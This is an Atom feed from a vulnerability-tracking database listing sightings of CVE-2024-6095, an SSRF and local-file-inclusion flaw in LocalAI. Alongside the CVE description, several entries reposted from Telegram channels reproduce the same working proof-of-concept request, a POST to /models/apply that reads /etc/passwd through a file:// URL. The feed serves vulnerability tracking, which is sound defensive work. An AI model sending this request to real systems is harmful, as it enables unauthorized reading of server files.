<?xml version='1.0' encoding='UTF-8'?>
<?xml-stylesheet href="/static/style.xsl" type="text/xsl"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="en">
  <id>https://db.gcve.eu/sightings/feed</id>
  <title>Most recent sightings.</title>
  <updated>2026-05-01T15:22:26.356480+00:00</updated>
  <author>
    <name>Vulnerability-Lookup</name>
    <email>info@gcve.eu</email>
  </author>
  <link href="https://db.gcve.eu" rel="alternate"/>
  <generator uri="https://lkiesow.github.io/python-feedgen" version="1.0.0">python-feedgen</generator>
  <subtitle>Contains only the most 10 recent sightings.</subtitle>
  <entry>
    <id>https://db.gcve.eu/sighting/e05366c2-898d-4b1d-9161-a3326aaad784/export</id>
    <title>e05366c2-898d-4b1d-9161-a3326aaad784</title>
    <updated>2026-05-01T15:22:26.680700+00:00</updated>
    <author>
      <name>cedric</name>
      <uri>http://db.gcve.eu/user/cedric</uri>
    </author>
    <content>{"uuid": "e05366c2-898d-4b1d-9161-a3326aaad784", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-6095", "type": "seen", "source": "https://t.me/cvedetector/152", "content": "{\n  \"Source\": \"CVE FEED\",\n  \"Title\": \"CVE-2024-6095 - A vulnerability in the /models/apply endpoint of m\", \n  \"Content\": \"CVE ID : CVE-2024-6095 \nPublished : July 6, 2024, 6:15 p.m. | 22\u00a0minutes ago \nDescription : A vulnerability in the /models/apply endpoint of mudler/localai versions 2.15.0 allows for Server-Side Request Forgery (SSRF) and partial Local File Inclusion (LFI). The endpoint supports both http(s):// and file:// schemes, where the latter can lead to LFI. However, the output is limited due to the length of the error message. This vulnerability can be exploited by an attacker with network access to the LocalAI instance, potentially allowing unauthorized access to internal HTTP(s) servers and partial reading of local files. The issue is fixed in version 2.17. \nSeverity: 5.8 | MEDIUM \nVisit the link for more details, such as CVSS details, affected products, timeline, and more...\",\n  \"Detection Date\": \"06 Jul 2024\",\n  \"Type\": \"Vulnerability\"\n}\n\ud83d\udd39 t.me/cvedetector \ud83d\udd39", "creation_timestamp": "2024-07-06T20:41:09.000000Z"}</content>
    <link href="https://db.gcve.eu/sighting/e05366c2-898d-4b1d-9161-a3326aaad784/export"/>
    <published>2024-07-06T20:41:09+00:00</published>
  </entry>
  <entry>
    <id>https://db.gcve.eu/sighting/dd7f40db-30f2-48d9-a6ef-9710ea9fe6f9/export</id>
    <title>dd7f40db-30f2-48d9-a6ef-9710ea9fe6f9</title>
    <updated>2026-05-01T15:22:26.680653+00:00</updated>
    <author>
      <name>cedric</name>
      <uri>http://db.gcve.eu/user/cedric</uri>
    </author>
    <content>{"uuid": "dd7f40db-30f2-48d9-a6ef-9710ea9fe6f9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-6095", "type": "published-proof-of-concept", "source": "https://t.me/realLulzSec/1868", "content": "CVE-2024-6095\n\nPOST /models/apply HTTP/1.1\n Host: 127.0.0.1\n Content-Type: application/json\n\n {\"url\":\"file:///etc/passwd\"}\n\n#exploit #poc", "creation_timestamp": "2024-08-30T08:38:48.000000Z"}</content>
    <link href="https://db.gcve.eu/sighting/dd7f40db-30f2-48d9-a6ef-9710ea9fe6f9/export"/>
    <published>2024-08-30T08:38:48+00:00</published>
  </entry>
  <entry>
    <id>https://db.gcve.eu/sighting/6ff83a1f-b04f-4c2d-9ca5-f16f45567f94/export</id>
    <title>6ff83a1f-b04f-4c2d-9ca5-f16f45567f94</title>
    <updated>2026-05-01T15:22:26.680600+00:00</updated>
    <author>
      <name>cedric</name>
      <uri>http://db.gcve.eu/user/cedric</uri>
    </author>
    <content>{"uuid": "6ff83a1f-b04f-4c2d-9ca5-f16f45567f94", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-6095", "type": "published-proof-of-concept", "source": "Telegram/sE-LFBykdILB5V7LepgUFtQYsi484fAF7CX1rAUmm_ATlsU", "content": "", "creation_timestamp": "2024-08-30T08:38:49.000000Z"}</content>
    <link href="https://db.gcve.eu/sighting/6ff83a1f-b04f-4c2d-9ca5-f16f45567f94/export"/>
    <published>2024-08-30T08:38:49+00:00</published>
  </entry>
  <entry>
    <id>https://db.gcve.eu/sighting/a6e24a51-d577-4138-a37d-ff2c7481e7cf/export</id>
    <title>a6e24a51-d577-4138-a37d-ff2c7481e7cf</title>
    <updated>2026-05-01T15:22:26.680550+00:00</updated>
    <author>
      <name>cedric</name>
      <uri>http://db.gcve.eu/user/cedric</uri>
    </author>
    <content>{"uuid": "a6e24a51-d577-4138-a37d-ff2c7481e7cf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-6095", "type": "published-proof-of-concept", "source": "Telegram/gExMF3sHIW8CrL_a-38ogXkaozkkP9VqJlzooQMuhYzpzQ", "content": "", "creation_timestamp": "2024-08-30T08:39:42.000000Z"}</content>
    <link href="https://db.gcve.eu/sighting/a6e24a51-d577-4138-a37d-ff2c7481e7cf/export"/>
    <published>2024-08-30T08:39:42+00:00</published>
  </entry>
  <entry>
    <id>https://db.gcve.eu/sighting/7f0280b5-31c3-48c9-bf30-ebeff85666ff/export</id>
    <title>7f0280b5-31c3-48c9-bf30-ebeff85666ff</title>
    <updated>2026-05-01T15:22:26.680499+00:00</updated>
    <author>
      <name>cedric</name>
      <uri>http://db.gcve.eu/user/cedric</uri>
    </author>
    <content>{"uuid": "7f0280b5-31c3-48c9-bf30-ebeff85666ff", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-6095", "type": "published-proof-of-concept", "source": "https://t.me/realLulzSec/18150", "content": "CVE-2024-6095\n\nPOST /models/apply HTTP/1.1\n Host: 127.0.0.1\n Content-Type: application/json\n\n {\"url\":\"file:///etc/passwd\"}\n\n#exploit #poc", "creation_timestamp": "2024-08-30T16:48:20.000000Z"}</content>
    <link href="https://db.gcve.eu/sighting/7f0280b5-31c3-48c9-bf30-ebeff85666ff/export"/>
    <published>2024-08-30T16:48:20+00:00</published>
  </entry>
  <entry>
    <id>https://db.gcve.eu/sighting/c5361875-7b8d-4ee4-a8b6-fb2195f302fa/export</id>
    <title>c5361875-7b8d-4ee4-a8b6-fb2195f302fa</title>
    <updated>2026-05-01T15:22:26.680446+00:00</updated>
    <author>
      <name>cedric</name>
      <uri>http://db.gcve.eu/user/cedric</uri>
    </author>
    <content>{"uuid": "c5361875-7b8d-4ee4-a8b6-fb2195f302fa", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-6095", "type": "published-proof-of-concept", "source": "https://t.me/CNArsenal/3088", "content": "CVE-2024-6095\n\nPOST /models/apply HTTP/1.1\n Host: 127.0.0.1\n Content-Type: application/json\n\n {\"url\":\"file:///etc/passwd\"}\n\n#exploit #poc", "creation_timestamp": "2024-08-31T07:50:44.000000Z"}</content>
    <link href="https://db.gcve.eu/sighting/c5361875-7b8d-4ee4-a8b6-fb2195f302fa/export"/>
    <published>2024-08-31T07:50:44+00:00</published>
  </entry>
  <entry>
    <id>https://db.gcve.eu/sighting/265db545-c276-41c6-ba50-33e87a8e826d/export</id>
    <title>265db545-c276-41c6-ba50-33e87a8e826d</title>
    <updated>2026-05-01T15:22:26.680392+00:00</updated>
    <author>
      <name>cedric</name>
      <uri>http://db.gcve.eu/user/cedric</uri>
    </author>
    <content>{"uuid": "265db545-c276-41c6-ba50-33e87a8e826d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-6095", "type": "published-proof-of-concept", "source": "https://t.me/realLulzSec/1884", "content": "CVE-2024-6095\n\nPOST /models/apply HTTP/1.1\n Host: 127.0.0.1\n Content-Type: application/json\n\n {\"url\":\"file:///etc/passwd\"}\n\n#exploit #poc", "creation_timestamp": "2024-09-01T00:52:55.000000Z"}</content>
    <link href="https://db.gcve.eu/sighting/265db545-c276-41c6-ba50-33e87a8e826d/export"/>
    <published>2024-09-01T00:52:55+00:00</published>
  </entry>
  <entry>
    <id>https://db.gcve.eu/sighting/a682d6c7-cff8-4492-924a-f57b65b0379e/export</id>
    <title>a682d6c7-cff8-4492-924a-f57b65b0379e</title>
    <updated>2026-05-01T15:22:26.680316+00:00</updated>
    <author>
      <name>cedric</name>
      <uri>http://db.gcve.eu/user/cedric</uri>
    </author>
    <content>{"uuid": "a682d6c7-cff8-4492-924a-f57b65b0379e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-6095", "type": "published-proof-of-concept", "source": "https://t.me/fattahh_ir/2727", "content": "CVE-2024-6095\n\nPOST /models/apply HTTP/1.1\n Host: 127.0.0.1\n Content-Type: application/json\n\n {\"url\":\"file:///etc/passwd\"}\n\n#exploit #poc", "creation_timestamp": "2024-09-01T10:34:35.000000Z"}</content>
    <link href="https://db.gcve.eu/sighting/a682d6c7-cff8-4492-924a-f57b65b0379e/export"/>
    <published>2024-09-01T10:34:35+00:00</published>
  </entry>
  <entry>
    <id>https://db.gcve.eu/sighting/6068f315-6634-4706-846d-d37b2c4a12cd/export</id>
    <title>6068f315-6634-4706-846d-d37b2c4a12cd</title>
    <updated>2026-05-01T15:22:26.679176+00:00</updated>
    <author>
      <name>cedric</name>
      <uri>http://db.gcve.eu/user/cedric</uri>
    </author>
    <content>{"uuid": "6068f315-6634-4706-846d-d37b2c4a12cd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-6095", "type": "published-proof-of-concept", "source": "https://t.me/realLulzSec/18317", "content": "CVE-2024-6095\n\nPOST /models/apply HTTP/1.1\n Host: 127.0.0.1\n Content-Type: application/json\n\n {\"url\":\"file:///etc/passwd\"}\n\n#exploit #poc", "creation_timestamp": "2024-09-01T16:43:26.000000Z"}</content>
    <link href="https://db.gcve.eu/sighting/6068f315-6634-4706-846d-d37b2c4a12cd/export"/>
    <published>2024-09-01T16:43:26+00:00</published>
  </entry>
</feed>
